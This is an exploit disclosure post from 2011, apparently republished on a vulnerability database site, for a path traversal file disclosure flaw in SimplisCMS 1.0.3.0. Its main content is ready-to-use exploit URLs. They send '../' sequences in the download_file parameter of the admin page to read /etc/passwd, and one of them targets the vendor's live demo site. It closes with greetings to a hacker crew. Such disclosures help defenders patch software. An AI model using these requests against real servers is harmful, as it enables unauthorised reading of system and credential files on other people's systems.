Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26015
HistoryMar 29, 2011 - 12:00 a.m.

SimplisCMS 1.0.3.0 Remote File Disclosure Vulnerability

2011-03-2900:00:00
vulners.com
25

##########################################################

Exploit Title: SimplisCMS 1.0.3.0 Remote File Disclosure Vulnerability

home : http://www.D99Y.com

Date: 27/3/2011

Author: NassRawI

Software Link: http://modcove.com/index.php

Demo : http://modcove.com/index.php?page=demo

Version: 1.0.3.0

##########################################################

file :

simpliscms/admin/index.php

exploit :

http://localhost/simpliscms/admin/index.php?action=do_download&download_file=[ Read files ]&page=&section=pages

http://localhost/simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/passwd&page=&section=pages

Demo :

http://modcove.com/demos/simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/passwd&page=&section=pages

##########################################################

Greetz :

D99Y Team + alroo7 alte No Tkd3 + oхіјєή + ǺŁṀṨŘŎŎŖĨ + JEenY + anT!-Tr0J4n + ReBLOoOV

  • FoFo < x-shadow my baby :$ + ‏Difficult 511 and all members D99Y.CoM

Enjoy :)